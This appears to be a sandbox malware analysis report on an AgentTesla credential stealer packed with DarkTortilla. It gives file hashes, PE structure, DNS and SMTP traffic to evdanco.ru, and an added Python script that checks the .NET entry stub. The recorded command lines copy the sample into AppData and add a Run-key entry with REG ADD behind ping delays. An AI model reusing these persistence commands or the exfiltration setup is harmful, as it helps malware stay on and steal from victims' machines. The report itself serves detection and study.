                                                      SHA-256:5B6C29EBC590C9E7C18C4C2020EFC6376BF0459B81A5A095348A752D94B758DE
                                                      SHA-512:152BCD7FA15F5CF4DF8C07D8AB1586D1838128AEBFEC7E64B37499104FFEC76318AEBC6849C8C5E4B42C8804A4433305A4CAE793474A1A72204538DFFE104771
                                                      Malicious:false
                                                      Preview:6900..C:\Users\user\AppData\Roaming\ACID.exe..1832..
                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2652672
                                                      Entropy (8bit):7.720198202140557
                                                      Encrypted:false
                                                      SSDEEP:49152:4To7KY/EhaBB4q38SQxZTC7YXepIt8RAF5IVITPqc6:4M7j38/+eoAjI6PL
                                                      MD5:043B9D0DE6BAD8FC4B4722987348329E
                                                      SHA1:6A344981C065F19B15736A0ED7AFE92DA6EF3CC0
                                                      SHA-256:466B1CF9BAE2D35D18DD3C8C9944861D770BF0DDA89BB535D5566F12D7CCD11D
                                                      SHA-512:D117646DE639D03A098063F33ED7323AA81D3A741477F982AE7A17384DDBFA392FBDDBCFE8721E3E3F99B97C098205E49B0D2352DB529933842EE7C69678920B
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y..%.................h'...........'.. ....'...@.. ........................(...........`.................................d.'.W.....'.......................(...................................................... ............... ..H............text....g'.. ...h'................. ..`.rsrc.........'......j'.............@..@.reloc........(......x(.............@..B..................'.....H........*'.L]......8.......4'&.........................................}r|r}r.n.F.F.F.Pta.p.G.j.\.`-Z.PFa.p.G.j.\.`*Z.Pea.p.G.j.\.`0Z(Pna.p.GV$J$T$....b%,.C>"..8.2..%. %h.K>?..8.2..&.*%b..>/..8.2....n%0.J?.?I?..c.~>0._%>..#.)..9.<>t.W%#..#.)..:.6>~..%3..#.)..c.~>1..%[..#.)..n.4>y.Z%?..#.)..-.<>d..%?..#.)..%.!>q.Q%|..#.)..`.1>f..%X..#.)..<.'>-.Y%'..#.)..:.&>q.5%[..#.)..:.n>w.R%8..#.)..#.&>~.5%[..#.).. .<>s..%2..#.).. .$>..X%:..#.)..c.'>u.R%...#.)..c.~>1..%m.i.i.....V.U.....
                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:modified
                                                      Size (bytes):42064
                                                      Entropy (8bit):6.19564898727408
                                                      Encrypted:false
                                                      SSDEEP:384:qtpFVLK0MsihB9VKS7xdgl6KJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+RPZTg:GBMs2SqdSZ6Iq8BxTfqWR8h7ukP
                                                      MD5:5D4073B2EB6D217C19F2B22F21BF8D57
                                                      SHA1:F0209900FBF08D004B886A0B3BA33EA2B0BF9DA8
                                                      SHA-256:AC1A3F21FCC88F9CEE7BF51581EAFBA24CC76C924F0821DEB2AFDF1080DDF3D3
                                                      SHA-512:9AC94880684933BA3407CDC135ABC3047543436567AF14CD9269C4ADC5A6535DB7B867D6DE0D6238A21B94E69F9890DBB5739155871A624520623A7E56872159
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,>.]..............0..T...........r... ........@.. ....................................`.................................4r..O....................b..PB...........p............................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............`..............@..B................hr......H........"..|J..........lm.......o......................................2~.....o....*.r...p(....*VrK..p(....s.........*..0..........(....(....o....o....(....o.... .....T(....o....(....o....o ...o!....4(....o....(....o....o ...o".....(....rm..ps#...o....($........(%....o&....ry..p......%.r...p.%.(.....(....('....((.......o)...('........*.*................"..(*...*..{Q...-...}Q.....(+...(....(,....(+...*"..(-...*..(....*..(.....r...p.(/...o0...s....}T...*....0.. .......~S...-.s
                                                      Process:C:\Windows\SysWOW64\PING.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1607
                                                      Entropy (8bit):4.76085226484577
                                                      Encrypted:false
                                                      SSDEEP:12:PKMRJpTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeT0sR:/ZTAokItULVDv
                                                      MD5:5040A956CEED74BBC4F0ED871791EA24
                                                      SHA1:E99982033A3263C3D69FE812A23E1F59F0CDDDC2
                                                      SHA-256:0871CCAE12C6B67BB8E64760D4850125AE4744A508CCA5A55A7A90813E53CF02
                                                      SHA-512:834C9885244E4AD260FF322E1437676D1672DC40BF907D4A3D796D348FF612951C963BA52B1C23163EDEEAEA51DBA262C3EC7EF9F063D5AC612D2AFF6B366D6A
                                                      Malicious:false
                                                      Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: byt
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.720198202140557
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:image.exe
                                                      File size:2'652'672 bytes
                                                      MD5:043b9d0de6bad8fc4b4722987348329e
                                                      SHA1:6a344981c065f19b15736a0ed7afe92da6ef3cc0
                                                      SHA256:466b1cf9bae2d35d18dd3c8c9944861d770bf0dda89bb535d5566f12d7ccd11d
                                                      SHA512:d117646de639d03a098063f33ed7323aa81d3a741477f982ae7a17384ddbfa392fbddbcfe8721e3e3f99b97c098205e49b0d2352db529933842ee7c69678920b
                                                      SSDEEP:49152:4To7KY/EhaBB4q38SQxZTC7YXepIt8RAF5IVITPqc6:4M7j38/+eoAjI6PL
                                                      TLSH:2DC523471F83B868D00889731025799C5375ACAE7EDAEB0B99DC33E4C77B6EAD716012
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y..%.................h'...........'.. ....'...@.. ........................(...........`................................
                                                      Icon Hash:443ad8d4dc581348
Entrypoint:0x6787be (a virtual address: image base 0x400000 + RVA 0x2787be, which is the final 6 bytes of .text)
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x25A88459 [Mon Jan 8 12:15:21 1990 UTC] (not a plausible build time for a .NET 4 image; treat the field as forged or hash-derived, not as a date)
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]   ; FF 25 00 20 40 00: indirect jump through the IAT slot at RVA 0x2000 (image base 0x400000 + 0x2000), which holds mscoree!_CorExeMain
add byte ptr [eax], al      ; listed 97 times in the report: the bytes after the 6-byte stub are zero, and 00 00 disassembles as this instruction
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x278764 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x27a000 | 0x10c90 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x28c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x2767c4 | 0x276800 | dabb49eaee48ea4311a2e17fab4dfb56 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x27a000 | 0x10c90 | 0x10e00 | e3e2dfd63a2cccfa16a07fb679912783 | False | 0.058492476851851855 | data | 3.143485306165341 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x28c000 | 0xc | 0x200 | 76fba4a48f46b6631a67107c1e2be166 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x27a0e8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m | | | 0.05199337513308885
RT_GROUP_ICON | 0x28a910 | 0x14 | data | | | 1.25
RT_VERSION | 0x28a924 | 0x36c | data | | | 0.4554794520547945
DLL | Import
mscoree.dll | _CorExeMain
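The entry-point listing, the directory table and the import table above all describe one mechanism: a .NET executable carries a single native instruction, `jmp dword ptr [00402000h]`, which reads the IAT slot at RVA 0x2000 (image base 0x400000 + 0x2000) holding the address of mscoree!_CorExeMain, and the bytes the listing disassembles after those six are zero (00 00 is `add byte ptr [eax], al`). The script below is an added example, not code from the Joe Sandbox report or from the sample. It decodes that stub, cross-checks it against the entry point, section and directory values listed above, and flags the 1990 timestamp. The stub bytes are constructed from the listed instruction's standard x86 encoding, the zero padding after them is my own, and the .NET 4.0 release date (12 April 2010) is used as the earliest plausible build time.

```python
import struct
from datetime import datetime, timezone

# Values transcribed from the report's PE header, section and directory tables.
IMAGE_BASE = 0x400000
ENTRYPOINT_VA = 0x6787be            # the report lists the entry point as a VA
TIME_DATE_STAMP = 0x25A88459
SECTIONS = {                        # name: (virtual address, virtual size)
    '.text':  (0x2000,   0x2767c4),
    '.rsrc':  (0x27a000, 0x10c90),
    '.reloc': (0x28c000, 0xc),
}
DIRECTORIES = {                     # name: (rva, size)
    'IMPORT':         (0x278764, 0x57),
    'IAT':            (0x2000,   0x8),
    'COM_DESCRIPTOR': (0x2008,   0x48),
}

# Constructed bytes: the standard encoding of the listed "jmp dword ptr [00402000h]"
# (FF 25 + little-endian absolute address) followed by zero bytes, which a
# disassembler renders as "add byte ptr [eax], al".
ENTRY_BYTES = bytes.fromhex('ff 25 00 20 40 00') + bytes(16)


def section_of(rva, sections):
    """Name of the section whose virtual range contains rva, else None."""
    for name, (va, size) in sections.items():
        if va <= rva < va + size:
            return name
    return None


def decode_clr_stub(code, image_base):
    """Decode the 6-byte native stub at a .NET executable's entry point.

    Returns the RVA of the IAT slot the jmp reads through, or None if the
    bytes are not "FF 25 disp32" (jmp dword ptr [absolute address]).
    """
    if len(code) < 6 or code[0] != 0xFF or code[1] != 0x25:
        return None
    target_va = struct.unpack_from('<I', code, 2)[0]
    return target_va - image_base


def check_managed_entry(code, image_base, entry_va, sections, directories):
    """Cross-check the stub against the section and directory tables."""
    entry_rva = entry_va - image_base
    slot_rva = decode_clr_stub(code, image_base)
    iat_rva, iat_size = directories['IAT']
    sec = section_of(entry_rva, sections)
    tail = code[6:]
    return {
        'entry_rva': entry_rva,
        'entry_section': sec,
        # compiler-emitted .NET images place the stub as the last 6 bytes of .text
        'stub_ends_section': sec is not None and entry_rva + 6 == sum(sections[sec]),
        'jmp_targets_iat': slot_rva is not None and iat_rva <= slot_rva < iat_rva + iat_size,
        'has_clr_header': directories.get('COM_DESCRIPTOR', (0, 0))[1] != 0,
        'zero_padding_after_stub': len(tail) - len(tail.lstrip(b'\x00')),
    }


DOTNET4_RELEASE = datetime(2010, 4, 12, tzinfo=timezone.utc)


def timestamp_plausible(stamp, now=None):
    """False when TimeDateStamp predates .NET 4.0 or lies in the future.

    Deterministic compilers write a hash-derived value here and packers
    overwrite it, so an implausible stamp is a triage signal, not a date.
    """
    now = now or datetime.now(timezone.utc)
    when = datetime.fromtimestamp(stamp, tz=timezone.utc)
    return DOTNET4_RELEASE <= when <= now, when


if __name__ == '__main__':
    print(check_managed_entry(ENTRY_BYTES, IMAGE_BASE, ENTRYPOINT_VA, SECTIONS, DIRECTORIES))
    print(timestamp_plausible(TIME_DATE_STAMP))
```

On the listed values the checks agree with each other: the entry point is RVA 0x2787be, the jump reads the IAT slot at 0x2000, a CLR header is present at 0x2008, and the stub's last byte is the last byte of .text; only the timestamp fails, landing on 8 January 1990.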
DNS queries

Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name           Type            Class        DNS over HTTPS
Aug 13, 2024 16:31:37.784745932 CEST  192.168.2.6  1.1.1.1  0x5ad4    Standard query (0)  api.ipify.org  A (IP address)  IN (0x0001)  false
Aug 13, 2024 16:31:38.491343975 CEST  192.168.2.6  1.1.1.1  0xdc69    Standard query (0)  ip-api.com     A (IP address)  IN (0x0001)  false
Aug 13, 2024 16:31:40.398565054 CEST  192.168.2.6  1.1.1.1  0x575b    Standard query (0)  evdanco.ru     A (IP address)  IN (0x0001)  false

DNS answers

Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name           CName  Address        Type            Class        DNS over HTTPS
Aug 13, 2024 16:31:37.792290926 CEST  1.1.1.1    192.168.2.6  0x5ad4    No error (0)  api.ipify.org         104.26.13.205  A (IP address)  IN (0x0001)  false
Aug 13, 2024 16:31:37.792290926 CEST  1.1.1.1    192.168.2.6  0x5ad4    No error (0)  api.ipify.org         172.67.74.152  A (IP address)  IN (0x0001)  false
Aug 13, 2024 16:31:37.792290926 CEST  1.1.1.1    192.168.2.6  0x5ad4    No error (0)  api.ipify.org         104.26.12.205  A (IP address)  IN (0x0001)  false
Aug 13, 2024 16:31:38.499052048 CEST  1.1.1.1    192.168.2.6  0xdc69    No error (0)  ip-api.com            208.95.112.1   A (IP address)  IN (0x0001)  false
Aug 13, 2024 16:31:40.591859102 CEST  1.1.1.1    192.168.2.6  0x575b    No error (0)  evdanco.ru            80.96.42.133   A (IP address)  IN (0x0001)  false
                                                      • api.ipify.org
                                                      • ip-api.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.6  49728        208.95.112.1    80                1112  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp                             Bytes transferred  Direction  Data
Aug 13, 2024 16:31:38.504981041 CEST  80                 OUT        GET /line/?fields=hosting HTTP/1.1
                                                                    Host: ip-api.com
                                                                    Connection: Keep-Alive
Aug 13, 2024 16:31:38.989346981 CEST  175                IN         HTTP/1.1 200 OK
                                                                    Date: Tue, 13 Aug 2024 14:31:38 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Content-Length: 6
                                                                    Access-Control-Allow-Origin: *
                                                                    X-Ttl: 60
                                                                    X-Rl: 44
                                                                    Data Raw: 66 61 6c 73 65 0a
                                                                    Data Ascii: false


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.6  49727        104.26.13.205   443               1112  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp                Bytes transferred  Direction  Data
2024-08-13 14:31:38 UTC  155                OUT        GET / HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                       Host: api.ipify.org
                                                       Connection: Keep-Alive
2024-08-13 14:31:38 UTC  211                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 13 Aug 2024 14:31:38 GMT
                                                       Content-Type: text/plain
                                                       Content-Length: 11
                                                       Connection: close
                                                       Vary: Origin
                                                       CF-Cache-Status: DYNAMIC
                                                       Server: cloudflare
                                                       CF-RAY: 8b2968f1288c4235-EWR
2024-08-13 14:31:38 UTC  11                 IN         Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                       Data Ascii: 8.46.123.33


Timestamp                             Source Port  Dest Port  Source IP     Dest IP       Commands
Aug 13, 2024 16:31:41.442847013 CEST  587          49729      80.96.42.133  192.168.2.6   220-evdanco.ro ESMTP Exim 4.97.1 #2 Tue, 13 Aug 2024 17:31:41 +0300
                                                                                          220- We do not authorize the use of this system to transport unsolicited,
                                                                                          220 and/or bulk e-mail.
Aug 13, 2024 16:31:41.443054914 CEST  49729        587        192.168.2.6   80.96.42.133  EHLO 648351
Aug 13, 2024 16:31:41.662904024 CEST  587          49729      80.96.42.133  192.168.2.6   250-evdanco.ro Hello 648351 [8.46.123.33]
                                                                                          250-SIZE 52428800
                                                                                          250-8BITMIME
                                                                                          250-PIPELINING
                                                                                          250-PIPECONNECT
                                                                                          250-AUTH PLAIN LOGIN
                                                                                          250-STARTTLS
                                                                                          250 HELP
Aug 13, 2024 16:31:44.249110937 CEST  49729        587        192.168.2.6   80.96.42.133  STARTTLS
Aug 13, 2024 16:31:44.472996950 CEST  587          49729      80.96.42.133  192.168.2.6   220 TLS go ahead

Target ID: 0
Start time: 10:29:35
Start date: 13/08/2024
Path: C:\Users\user\Desktop\image.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\image.exe"
Imagebase: 0x40000
File size: 2'652'672 bytes
MD5 hash: 043B9D0DE6BAD8FC4B4722987348329E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2390999485.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2396428280.0000000006F40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2378327661.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2390999485.0000000005D41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 3
Start time: 10:29:41
Start date: 13/08/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"
Imagebase: 0x1c0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 10:29:41
Start date: 13/08/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 10:29:41
Start date: 13/08/2024
Path: C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit): true
Commandline: ping 127.0.0.1 -n 16
Imagebase: 0xe30000
File size: 18'944 bytes
MD5 hash: B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 10:29:51
Start date: 13/08/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "cmd" /c ping 127.0.0.1 -n 28 > nul && copy "C:\Users\user\Desktop\image.exe" "C:\Users\user\AppData\Roaming\ACID.exe" && ping 127.0.0.1 -n 28 > nul && "C:\Users\user\AppData\Roaming\ACID.exe"
Imagebase: 0x1c0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 8
Start time: 10:29:51
Start date: 13/08/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 9
Start time: 10:29:51
Start date: 13/08/2024
Path: C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit): true
Commandline: ping 127.0.0.1 -n 28
Imagebase: 0xe30000
File size: 18'944 bytes
MD5 hash: B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 10:29:56
Start date: 13/08/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"
Imagebase: 0x4d0000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 10:30:19
Start date: 13/08/2024
Path: C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit): true
Commandline: ping 127.0.0.1 -n 28
Imagebase: 0xe30000
File size: 18'944 bytes
MD5 hash: B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 15
Start time: 10:30:46
Start date: 13/08/2024
Path: C:\Users\user\AppData\Roaming\ACID.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\ACID.exe"
Imagebase: 0x710000
File size: 2'652'672 bytes
MD5 hash: 043B9D0DE6BAD8FC4B4722987348329E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000F.00000002.3447289746.000000000309A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000F.00000002.3447289746.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 34%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:16
                                                      Start time:10:31:03
                                                      Start date:13/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                      Imagebase:0xdd0000
                                                      File size:42'064 bytes
                                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
